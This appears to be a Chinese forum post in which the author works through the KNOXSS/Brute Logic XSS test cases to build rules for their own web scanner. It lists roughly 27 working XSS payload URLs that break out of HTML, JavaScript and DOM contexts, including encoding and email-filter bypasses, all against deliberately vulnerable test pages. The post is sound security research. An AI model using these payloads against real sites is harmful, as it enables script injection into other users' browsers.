初探 knoxss 扫描规则

0x0 前言

​ knoxss在twitter经常看见,但是了解不是很深,不过碰巧看见了那个knoxss的发的测试页面,又碰巧自己最近在写扫描器,于是打算通过这个页面来参考下扫描规则。本文没有深入,只是基于题型设计构造出了payload,可能不符合题目的用意,欢迎师傅斧正。

0x1 Source-Based XSS Test Cases

0x1 Single Reflection

0x1 case 01 Direct URL Injection (no parameter)

​ 地址:Case 01 - Direct URL Injection (no parameter)

​ 这个是个post类型的xss,value处可注入代码

​ 选择一个框填入即可:"/><scripr>alert(1);</script>

0x2 Simple HTML Injection (a)

​ a参数可直接插入语句

​ 地址:Case 02 - Simple HTML Injection (a)

​ payload:https://brutelogic.com.br/xss.php?a=%3Cscript%3Ealert(1)%3C/script%3E

0x3 Inline HTML Injection with Double Quotes

​ 地址:Case 03 - Inline HTML Injection with Double Quotes (b1)

​ payload:https://brutelogic.com.br/xss.php?b1=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

0x4 Inline HTML Injection with Single Quotes

​ 地址:Case 04 - Inline HTML Injection with Single Quotes (b2)

​ payload:https://brutelogic.com.br/xss.php?b2=1%27%3E%3Cscript%3Ealert(1)%3C/script%3E

0x5 Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

​ 地址:Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

​ payload:https://brutelogic.com.br/xss.php?b3=1%22%20onfocus=%22alert(1);%22%20autofocus%20a=%221

0x6 Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

​ 地址:Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

​ payload:https://brutelogic.com.br/xss.php?b4=1%27%20onfocus=%27alert(1);%27%20autofocus%20a=%271

0x7 HTML Injection with Single Quotes in JS Block (c1)

​ 这个payload很有意思的,涉及优先级和js作用域

​ 地址:Case 07 - HTML Injection with Single Quotes in JS Block (c1)

​ payload: https://brutelogic.com.br/xss.php?c1=1%3C/script%3E%3Cimg%20src=x%20onerror=%22alert(1)%22%3E

0x8 HTML Injection with Double Quotes in JS Block (c2)

​ 地址:Case 08 - HTML Injection with Double Quotes in JS Block (c2)

​ payload:https://brutelogic.com.br/xss.php?c2=1%22%3C/script%3E%3Cimg%20src=x%20onerror=alert(1)%3E

0x9 Simple JS Injection with Single Quotes (c3)

​ 地址:Case 09 - Simple JS Injection with Single Quotes (c3)

​ payload:https://brutelogic.com.br/xss.php?c3=1%27;alert(1);//

0x10 Simple JS Injection with Double Quotes (c4)

​ 地址:Case 10 - Simple JS Injection with Double Quotes (c4)

​ Payload:https://brutelogic.com.br/xss.php?c4=1%22;alert(1);//

0x11 Escaped JS Injection with Single Quotes (c5)

​ 地址:Case 11 - Escaped JS Injection with Single Quotes (c5)

​ Payload:https://brutelogic.com.br/xss.php?c5=1\%27;alert(1);//

0x12 Escaped JS Injection with Double Quotes (c6)

​ 地址:Case 12 - Escaped JS Injection with Double Quotes (c6)

​ Payload:https://brutelogic.com.br/xss.php?c6=1\%22;alert(1);//

0x13 Simple XML Injection (p)

​ 这个xml触发xss很有意思的一个payload。(这里我不是很理解,希望师傅能贴下相关链接给我学习下)

​ 地址:Case 13 - Simple XML Injection (p)

​ payload:https://brutelogic.com.br/xml.php?p=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert(1%3C/x:script%3E

0x2 Multi Reflection (Pro Only)

0x14 Double Injection in HTML Context with Double Quotes

​ 地址:Case 14 - Double Injection in HTML Context with Double Quotes

​ payload:http://brutelogic.com.br/multi/double-html.php?p=123%22%3E%3Cscript%3Ealert(1);%3C/script%3E

0x15 Double Injection in Mixed Context (HTML + JS) with Default Quotes

​ 地址:Case 15 - Double Injection in Mixed Context (HTML + JS) with Default Quotes

​ payload:http://brutelogic.com.br/multi/double-mixed.php?p=1%27;alert(1);//%22%3E%3Cscript%3Ealert(1);%3C/script%3E

0x16 Quoteless Inline Double Injection in JS variables

​ 地址:Case 16 - Quoteless Inline Double Injection in JS variables

​ payload:http://brutelogic.com.br/multi/js-inline.php?p=;alert(1);//\

0x17 Quoteless Inline Double Injection in JS object

​ 地址:Case 17 - Quoteless Inline Double Injection in JS object

​ payload:http://brutelogic.com.br/multi/js-object.php?p=};alert(1);//\

0x18 Quoteless Inline Double Injection in JS object with Nested Array

​ 地址:Case 18 - Quoteless Inline Double Injection in JS object with Nested Array

​ payload: http://brutelogic.com.br/multi/js-object2.php?p=}]};alert(1);//\

0x19 Quoteless Inline Double Injection in JS object with Nested Function

​ 地址:Case 19 - Quoteless Inline Double Injection in JS object with Nested Function

​ Payload:http://brutelogic.com.br/multi/js-object3.php?p=;}}};alert(1);//\

0x3 Special Cases (Pro Only)

0x20 SQLi error-based HTML Injection *

​ 地址:Case 20 - SQLi error-based HTML Injection *

​ payload:http://testphp.vulnweb.com/listproducts.php?cat=1%27%3Cscript%3Ealert(1)%3C/script%3E

0x21 PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

​ 地址:Case 21 - PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

​ Payload: http://brutelogic.com.br/tests/email.php?email=%22%3Cscript%3Ealert(1);%3C/script%3E%22@brutelogic.com.br

0x22 Double-Encoded HTML Injection

​ 地址:Case 22 - Double-Encoded HTML Injection

​ Payload:http://brutelogic.com.br/tests/double-enc.php?p=%253cscript%253ealert(1)%253c%252fscript%253e

0x23 Base64 HTML Injection

​ 地址:Case 23 - Base64 HTML Injection

​ Payload:http://brutelogic.com.br/tests/base64.php?p=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

0x4 DOM-based XSS Test Cases

0x24 DOM Injection via URL parameter (by server + client)

​ 地址:Case 24 - DOM Injection via URL parameter (by server + client)

​ Payload:http://brutelogic.com.br/dom/dom.php?p=%3Cimg%20src=x%20onerror=alert(1)%3E

0x25 DOM Injection via URL Parameter (Document Sink)]

​ 地址:Case 25 - DOM Injection via URL Parameter (Document Sink)

​ Payload:http://brutelogic.com.br/dom/sinks.html?name=%3Cimg%20src=x%20onerror=alert(1)%3E

0x26 DOM Injection via Open Redirection (Location Sink)

​ 地址:Case 26 - DOM Injection via Open Redirection (Location Sink)

​ Payload:http://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)

0x27 DOM Injection via URL Parameter (Execution Sink)

​ 地址:Case 27 - DOM Injection via URL Parameter (Execution Sink)

​ Payload:http://brutelogic.com.br/dom/sinks.html?index=%27NASDAQ%27;alert(1);

0x5 Blind XSS Test Case

0x1 Navigate to the following page and wait for KNOXSS message of "Nothing found for FORM"

​ 地址:Stored Text - Attacker's Input

0x2 Open the victim's page simulating his/her access. An email with report will come to your inbox

​ 地址:Stored Text - Victim's Triggering

​ 这个分两步第一步先提交payload:<script>alert(1)</script>,然后第二步点击0x2的地址,这个我感觉扫描的情景比较庞大,暂时没想到怎么写扫码去处理这种情况。

0x6 Authenticated XSS Test Case

0x1 Authenticated XSS Test Case

​ 地址:XSS After Login

​ 这个就是登陆之后带cookie的xss,感觉没什么特殊的,带cookie去扫描就行了

0x7 总结

​ 这个其实是knoxss的扫描工具的规则映射,可能内部会更加复杂,不过这些payload对于当前我这种菜鸟来说,效率是可以接受的,是值得去参考的。目前扫描器的主动扫描部分也确定了用scrapy来做爬虫然后进行规则扫描,目前对于sql注入的状态判断法很有兴趣,由于传统网站都会有waf,基于状态探测法能很好发现隐蔽的注入,目前扫描器还在继续开发中ing

0x8 彩蛋

​ 分享下自用扫描器的ui

点击收藏 | 0 关注 | 1
登录 后跟帖